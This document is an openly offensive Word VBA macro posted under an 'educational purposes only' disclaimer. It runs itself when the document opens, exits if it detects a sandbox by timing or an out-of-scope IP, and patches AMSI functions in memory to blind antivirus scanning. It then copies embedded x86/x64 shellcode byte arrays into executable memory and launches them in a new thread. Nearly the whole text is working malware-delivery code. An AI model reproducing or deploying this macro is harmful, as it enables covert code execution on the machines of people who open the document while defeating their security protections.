All exploits are written my myself and are for educational purposes only, i would not be liable for any misuse!
###Macros with Several Variations
Credit to Ocktoberfirst on this initial macro
Type MODULEINFO
lpBaseOfDLL As Long
SizeOfImage As Long
EntryPoint As Long
End Type
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function GetPrAddr Lib "KERNEL32" Alias "GetProcAddress" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Function VirtPro Lib "KERNEL32" Alias "VirtualProtect" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProcess As LongPtr, lpflOldProtect As LongPtr) As LongPtr
Private Declare PtrSafe Function getmod Lib "KERNEL32" Alias "GetModuleHandleA" (ByVal lpLibFileName As String) As LongPtr
Private Declare PtrSafe Sub patched Lib "KERNEL32" Alias "RtlFillMemory" (Destination As Any, ByVal Length As Long, ByVal Fill As Byte)
Public Declare PtrSafe Function EnumProcessModulesEx Lib "psapi.dll" (ByVal hProcess As LongPtr, lphModule As LongPtr, ByVal cb As LongPtr, lpcbNeeded As LongPtr, ByVal dwFilterFlag As LongPtr) As LongPtr
Public Declare PtrSafe Function GetModuleBaseName Lib "psapi.dll" Alias "GetModuleBaseNameA" (ByVal hProcess As LongPtr, ByVal hModule As LongPtr, ByVal lpFileName As String, ByVal nSize As LongPtr) As LongPtr
Function MyMacro()
'Get current time, sleep 4 seconds, get time again. If less than 4 seconds have passed, assume we are in a AV sandbox and exit without running rest of macro.
Dim myTime
myTime = Time
Dim Timein As Date
Timein = Date + myTime
Sleep (4000)
Dim second_time
second_time = Time
Dim Timeout As Date
Timeout = Date + second_time
Dim subtime As Variant
subtime = DateDiff("s", Timein, Timeout)
Dim vOut As Integer
vOut = CInt(subtime)
If subtime < 3.5 Then
Exit Function
End If
'initialize variables
Dim Is64 As Boolean
Dim StrFile As String
Dim check As Boolean
Dim buf As Variant
Dim addr As LongPtr
Dim counter As LongPtr
Dim data As String
Dim res As LongPtr
Dim ipcheck As Boolean
ipcheck = False
Dim inscope As String
'define in scope IP's. We can use wildcards here.
inscope = "192.168.*"
'Call ip check function. Returns True if machine IP is in scope. If True, pass. If False, exit.
ipcheck = getMyIP(inscope)
If ipcheck Then
Else
Exit Function
End If
'Dynamically resolve amsi.dll
StrFile = Dir("c:\windows\system32\a?s?.d*")
'Call architecture function to determine if we are in 32 bit or 64 bit word. 64 bit returns True.
Is64 = arch()
'Call amsi check function to determine if amsi.dll is loaded into Word. This is the case in word 2019+. Returns True if Amsi is found.
check = amcheck(StrFile)
'This portion to delete document body and replace with auto text (the "legit" content)
'ActiveDocument.Content.Select
'Selection.Delete
'ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=True
'If amsi is found, call amsi patching function. Pass architecture of Word as additional arg to function.
If check Then
patch StrFile, Is64
End If
'Include shellcode for both x86 and x64.
'also no encryption routine on this shellcode, might have to look into something like xor or rot or caeser cipher to strengten it
If Is64 Then
buf = Array(49, 125, 184, 25, 37, 29, 1, 53, 53, 53, 118, 134, 118, 133, 135, 125, 102, 7, 154, 125, 192, 135, 149, 125, 192, 135, 77, 125, 192, 135, 85, 134, 139, 125, 68, 236, 127, 127, 125, 192, 167, 133, 130, 102, 254, 125, 102, 245, 225, 113, _
150, 177, 55, 97, 85, 118, 246, 254, 66, 118, 54, 246, 23, 34, 135, 125, 192, 135, 85, 118, 134, 192, 119, 113, 125, 54, 5, 155, 182, 173, 77, 64, 55, 68, 186, 167, 53, 53, 53, 192, 181, 189, 53, 53, 53, 125, 186, 245, 169, 156, _
125, 54, 5, 133, 192, 125, 77, 121, 192, 117, 85, 126, 54, 5, 24, 139, 130, 102, 254, 125, 52, 254, 118, 192, 105, 189, 125, 54, 11, 125, 102, 245, 118, 246, 254, 66, 225, 118, 54, 246, 109, 21, 170, 38, 129, 56, 129, 89, 61, 122, _
110, 6, 170, 13, 141, 121, 192, 117, 89, 126, 54, 5, 155, 118, 192, 65, 125, 121, 192, 117, 81, 126, 54, 5, 118, 192, 57, 189, 118, 141, 125, 54, 5, 118, 141, 147, 142, 143, 118, 141, 118, 142, 118, 143, 125, 184, 33, 85, 118, 135, _
52, 21, 141, 118, 142, 143, 125, 192, 71, 30, 128, 52, 52, 52, 146, 125, 102, 16, 136, 126, 243, 172, 158, 163, 158, 163, 154, 169, 53, 118, 139, 125, 190, 22, 126, 252, 247, 129, 172, 91, 60, 52, 10, 136, 136, 125, 190, 22, 136, 143, _
130, 102, 245, 130, 102, 254, 136, 136, 126, 239, 111, 139, 174, 220, 53, 53, 53, 53, 52, 10, 29, 67, 53, 53, 53, 102, 110, 103, 99, 102, 107, 109, 99, 105, 110, 99, 107, 107, 53, 143, 125, 190, 246, 126, 252, 245, 240, 54, 53, 53, _
130, 102, 254, 136, 136, 159, 56, 136, 126, 239, 140, 190, 212, 251, 53, 53, 53, 53, 52, 10, 29, 8, 53, 53, 53, 100, 120, 161, 155, 101, 109, 138, 157, 148, 121, 130, 150, 169, 119, 107, 172, 123, 175, 101, 171, 125, 137, 134, 173, 151, _
155, 125, 124, 119, 108, 175, 148, 142, 161, 133, 119, 106, 134, 127, 106, 106, 134, 136, 134, 138, 170, 109, 158, 132, 131, 109, 153, 154, 105, 137, 165, 125, 124, 163, 125, 143, 159, 155, 128, 150, 158, 164, 133, 109, 121, 160, 129, 135, 134, 157, _
124, 120, 105, 139, 106, 163, 164, 128, 158, 156, 143, 165, 158, 141, 150, 166, 136, 109, 148, 162, 142, 124, 142, 109, 155, 153, 173, 174, 98, 109, 148, 159, 142, 135, 106, 125, 150, 167, 130, 143, 167, 152, 141, 119, 134, 132, 124, 167, 102, 162, _
159, 160, 123, 126, 169, 163, 110, 131, 107, 155, 159, 109, 103, 165, 153, 168, 174, 138, 161, 105, 109, 165, 105, 142, 163, 98, 158, 173, 173, 162, 172, 125, 133, 164, 170, 107, 173, 139, 155, 153, 160, 162, 122, 170, 125, 168, 122, 137, 133, 157, _
158, 155, 123, 158, 167, 133, 135, 175, 170, 134, 107, 156, 150, 121, 165, 133, 168, 155, 119, 148, 131, 132, 102, 106, 126, 165, 125, 110, 160, 120, 150, 134, 125, 157, 142, 53, 125, 190, 246, 136, 143, 118, 141, 130, 102, 254, 136, 125, 237, 53, _
103, 221, 185, 53, 53, 53, 53, 133, 136, 136, 126, 252, 247, 32, 138, 99, 112, 52, 10, 125, 190, 251, 159, 63, 148, 125, 190, 38, 159, 84, 143, 135, 157, 181, 104, 53, 53, 126, 190, 21, 159, 57, 118, 142, 126, 239, 170, 123, 211, 187, _
53, 53, 53, 53, 52, 10, 130, 102, 245, 136, 143, 125, 190, 38, 130, 102, 254, 130, 102, 254, 136, 136, 126, 252, 247, 98, 59, 77, 176, 52, 10, 186, 245, 170, 84, 125, 252, 246, 189, 72, 53, 53, 126, 239, 121, 37, 106, 21, 53, 53, _
53, 53, 52, 10, 125, 52, 4, 169, 55, 32, 223, 29, 138, 53, 53, 53, 136, 142, 159, 117, 143, 126, 190, 6, 246, 23, 69, 126, 252, 245, 53, 69, 53, 53, 126, 239, 141, 217, 136, 26, 53, 53, 53, 53, 52, 10, 125, 200, 136, 136, _
125, 190, 28, 125, 190, 38, 125, 190, 15, 126, 252, 245, 53, 85, 53, 53, 126, 190, 46, 126, 239, 71, 203, 190, 23, 53, 53, 53, 53, 52, 10, 125, 184, 249, 85, 186, 245, 169, 231, 155, 192, 60, 125, 54, 248, 186, 245, 170, 7, 141, _
248, 141, 159, 53, 142, 126, 252, 247, 37, 234, 215, 139, 52, 10)
Else
buf = Array(141,153,254,113,113,113,17,64,163,248,148,21,250,35,65,250,35,125,250,35,101,64,142,126,198,59,87,250,3,89,64,177,221,77,16,13,115,93,81,176,190,124,112,182,56,4,158,35,38,250,35,97,250,51,77,112,161,250,49,9,244,177,5,61,112,161,250,41,81,33,250,57,105,112,162,244,184,5,77,56,64, _
142,250,69,250,112,167,64,177,176,190,124,221,112,182,73,145,4,133,114,12,137,74,12,85,4,145,41,250,41,85,112,162,23,250,125,58,250,41,109,112,162,250,117,250,112,161,248,53,85,85,42,42,16,40,43,32,142,145,41,46,43,250,99,152,241,142,142,142,44,25,31,20,5,113,25,6,24,31,24,37, _
25,61,6,87,118,142,164,64,170,34,34,34,34,34,153,79,113,113,113,60,30,11,24,29,29,16,94,68,95,65,81,89,38,24,31,21,30,6,2,81,63,37,81,71,95,64,74,81,37,3,24,21,20,31,5,94,70,95,65,74,81,3,7,75,64,64,95,65,88,81,29,24,26,20,81,54,20,18,26,30, _
113,25,75,39,8,214,142,164,34,34,27,114,34,34,25,202,112,113,113,153,30,112,113,113,94,24,64,16,61,50,92,11,54,19,37,19,7,60,20,69,6,27,41,64,29,32,22,2,11,60,54,23,92,56,38,1,61,38,64,92,16,3,19,65,64,8,55,37,54,69,21,39,25,57,11,8,71,61,3,3, _
34,36,26,4,60,58,70,27,26,51,32,35,56,58,64,30,8,73,72,53,38,30,33,68,59,6,66,62,62,72,16,9,70,46,52,55,2,7,40,5,43,26,19,9,61,51,32,16,21,41,20,32,25,0,67,4,24,33,72,2,72,46,29,66,71,29,21,7,30,21,59,22,57,55,39,4,39,3,60,59, _
21,46,27,20,60,20,2,18,64,4,29,58,41,30,67,28,27,52,50,59,65,37,60,51,25,55,64,41,51,56,46,58,67,32,34,8,53,28,66,22,2,20,24,11,60,32,20,2,34,16,25,65,18,68,41,37,52,28,5,43,69,51,51,36,20,72,46,0,31,0,4,55,64,37,11,7,6,26,59,46, _
43,18,34,46,32,60,26,58,28,26,3,72,4,8,28,59,25,4,62,33,46,2,9,69,27,68,29,113,33,25,38,248,238,183,142,164,248,183,34,25,113,115,25,245,34,34,34,38,34,39,25,154,36,95,74,142,164,231,27,123,46,34,34,34,34,39,25,92,119,105,10,142,164,244,177,4,101,25,249,98, _
113,113,25,53,129,68,145,142,164,62,4,144,153,59,113,113,113,27,49,25,113,97,113,113,25,113,113,49,113,34,25,41,213,34,148,142,164,226,34,34,248,150,38,25,113,81,113,113,34,39,25,99,231,248,147,142,164,244,177,5,190,250,118,112,178,244,177,4,148,41,178,46,153,14,142,142,142,64,72,67, _
95,64,71,73,95,69,72,95,71,71,113,202,145,108,91,123,25,215,228,204,236,142,164,77,119,13,123,241,138,145,4,116,202,54,98,3,30,27,113,34,142,164)
End If
'Create new space in memory within current process
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
'Copy shellcode to newly created memory
For counter = LBound(buf) To UBound(buf)
data = Hex(buf(counter))
patched ByVal (addr + counter), 1, ByVal ("&H" & data)
Next counter
'create thread to execute shellcode
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Function arch() As Boolean
'check architecture of current word process
#If Win64 Then
arch = True
#Else
arch = False
#End If
End Function
Public Function getMyIP(ipcheck As String) As Boolean
'uses WMI to get all IP's associated with machine. Each one is then checked against the wildcarded IP/network. If a match is found, returns True
Dim objWMI As Object
Dim objQuery As Object
Dim objQueryItem As Object
Dim vIpAddress
Dim counter As Integer
Dim ips() As String
Set objWMI = GetObject("winmgmts:\\.\root\cimv2")
Set objQuery = objWMI.ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objQueryItem In objQuery
For Each vIpAddress In objQueryItem.ipaddress
If CStr(vIpAddress) Like ipcheck Then
getMyIP = True
End If
Next
Next
End Function
Function amcheck(StrFile As String) As Boolean
'Checks for amsi.dll in word process. If found, returns True
Dim szProcessName As String
Dim mdi As MODULEINFO
Dim hMod(0 To 1023) As LongPtr
Dim res As LongPtr
amcheck = False
res = EnumProcessModulesEx(-1, hMod(0), 1024, cbNeeded, &H3)
For i = 0 To UBound(hMod)
szProcessName = String$(50, 0)
GetModuleBaseName -1, hMod(i), szProcessName, Len(szProcessName)
If Left(szProcessName, 8) = StrFile Then
amcheck = True
End If
Next i
End Function
Function patch(StrFile As String, Is64 As Boolean)
'patches amsi.dll in memory in order to disable it. Loads memory address of amsi.dll and then locates the AmsiUacInitialize function within it. The AmsiScanBuffer and AmsiScanString functions are located via relative offset from AmsiUacInitialize and then overwritten with a nop and then a ret to disable them.
' Depending on architecture these offsets vary, so a case is included for x86 and x64
Dim lib As LongPtr
Dim Func_addr As LongPtr
Dim temp As LongPtr
Dim old As LongPtr
Dim off As Integer
lib = getmod(StrFile)
If Is64 Then
off = 96
Else
off = 80
End If
Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off
temp = VirtPro(ByVal Func_addr, 32, 64, 0)
patched ByVal (Func_addr), 1, ByVal ("&H" & "90")
patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3")
temp = VirtPro(ByVal Func_addr, 32, old, 0)
If Is64 Then
off = 352
Else
off = 256
End If
Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off
temp = VirtPro(ByVal Func_addr, 32, 64, old)
patched ByVal (Func_addr), 1, ByVal ("&H" & "90")
patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3")
temp = VirtPro(ByVal Func_addr, 32, old, 0)
End Function
'macro name is test which calls the main method
Sub test()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub